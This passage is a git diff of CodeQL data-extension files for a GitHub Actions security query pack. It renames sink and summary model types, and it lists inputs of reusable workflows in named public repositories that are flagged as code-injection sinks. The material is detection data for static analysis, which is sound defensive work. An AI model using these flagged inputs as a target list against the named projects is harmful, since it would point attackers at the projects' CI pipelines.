a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml index c7f84e83db5a..995940550e19 100644 --- a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml index 72383be71ca2..93653f07819e 100644 --- a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.test_timeout", "code-injection", "generated"] - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.log_level", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml index 8b05adf053ea..961070778cfd 100644 --- a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.triggered_by_callable", "code-injection", "generated"] - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.package_version_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml index 9eec959ade3a..9f1cc82523cc 100644 --- a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "input.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml index 835301ecc73a..68babc09b6a1 100644 --- a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "input.unstable", "code-injection", "generated"] - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml index 9a99588239ee..f4271e5424b1 100644 --- a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "input.pattern", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml index 12c370b33ada..f20f7997d3c4 100644 --- a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "input.before-build", "code-injection", "generated"] - ["flyteorg/flyte/.github/workflows/integration.yml", "*", "input.component", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml index 0e03216fc698..da5617fd144d 100644 --- a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.org", "code-injection", "generated"] - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.solution", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml index 081378c96179..78821b4dad3c 100644 --- a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "input.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml index fcd9c2929013..f0c9290ca22e 100644 --- a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.output-path", "code-injection", "generated"] - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.settings", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml index 19822c29fcda..21d236989316 100644 --- a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "input.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml index d0ccde698b1a..ac38cac602d5 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.panaThreshold", "code-injection", "generated"] - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.sdk", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml index 027da83e922d..a9f87db955ea 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "input.target", "code-injection", "generated"] - ["getsentry/sentry-unity/.github/workflows/android-smoke-test.yml", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml index a914aa631c3d..99c706b0c28b 100644 --- a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "input.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml index d0fe6b0eff5a..f8d0172d684b 100644 --- a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml index 3d3a4de2946a..5afda471f8b7 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml index 4c58af6969dc..4e5ca50ccec1 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.path", "code-injection", "generated"] - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml index 8629f279891a..02801615bd51 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml index 4a6bbd77ec97..d808d612857f 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml index c22998ee52a4..e543dc8b7f34 100644 --- a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.build-version", "code-injection", "generated"] - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.wave-app-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml index c74922e61dc0..891d902f4709 100644 --- a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.dry-run", "code-injection", "generated"] - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml index c9c7e8318f7e..334d64dfbece 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image-tag", "taint", "manual"] - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml index 169094c3eb38..2c600cd7f7d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "input.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml index 6e4e4f4f1e90..cc6c4e620e60 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.package-names-command", "code-injection", "generated"] - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.go-test-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml index dbc26ef9f04f..efbf050ddc96 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "input.package", "code-injection", "generated"] - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.gitUser", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml index c69de7cfcc26..9860bd3ab92f 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "input.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml index 685b0b144c9d..c160c29f6f63 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.product-version", "code-injection", "generated"] - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.package-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml index 9e3fc5cdc4f8..910715eece07 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-max", "code-injection", "generated"] - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-name", "code-injection", "generated"] @@ -16,7 +16,7 @@ extensions: - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "input.storage_backend", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-version-package", "output.testable-packages", "taint", "manual"] - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-revision", "output.testable-containers", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml index 4cd6cd8f591a..f04e67670d3b 100644 --- a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "input.isStableRelease", "code-injection", "generated"] - ["heroku/cli/.github/workflows/promote.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml index 01726410e185..3d5fa057987c 100644 --- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml @@ -1,13 +1,13 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.project_name", "code-injection", "generated"] - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.dependency_track_url", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.stage", "output.release_stage", "taint", "manual"] - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.repo_url", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml index 90e61bcf11a0..31d0e691e7f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "input.version", "code-injection", "generated"] - ["home-assistant/operating-system/.github/workflows/artifacts-index.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml index b4e1ff8155a3..5f9da314f90b 100644 --- a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.windowsBuildArgs", "code-injection", "generated"] - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.bazelBuildArgs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml index 3621105b74e1..7ae494adb2b8 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.package_name", "code-injection", "generated"] - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.repo_owner", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml index b6660df1c9b2..dce969719d29 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.folder_slices", "code-injection", "generated"] - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.setup_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml index ead0bcfab169..cd5d5ff7d0fd 100644 --- a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.pull_request_number", "code-injection", "generated"] - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.qt_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml index 6f9a12e90698..fd17e601d805 100644 --- a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ibm/sarama/.github/workflows/fvt.yml", "*", "input.kafka-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml index 8ac32e4a7b7f..bed40dce4298 100644 --- a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "input.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml index 3c21fcad386c..62a12e471389 100644 --- a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml index e0d2508932fe..7491c4f951af 100644 --- a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "input.release-script-to-run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml index 96830183506a..1876f1146cbf 100644 --- a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "input.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml index 7f9299eb4d39..4a8534429f90 100644 --- a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "input._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml index 7a79d4c1e092..ecac3f22f851 100644 --- a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml index 55888f485510..ffc4193edbf1 100644 --- a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml @@ -1,6 +1,6 @@ extensions: - 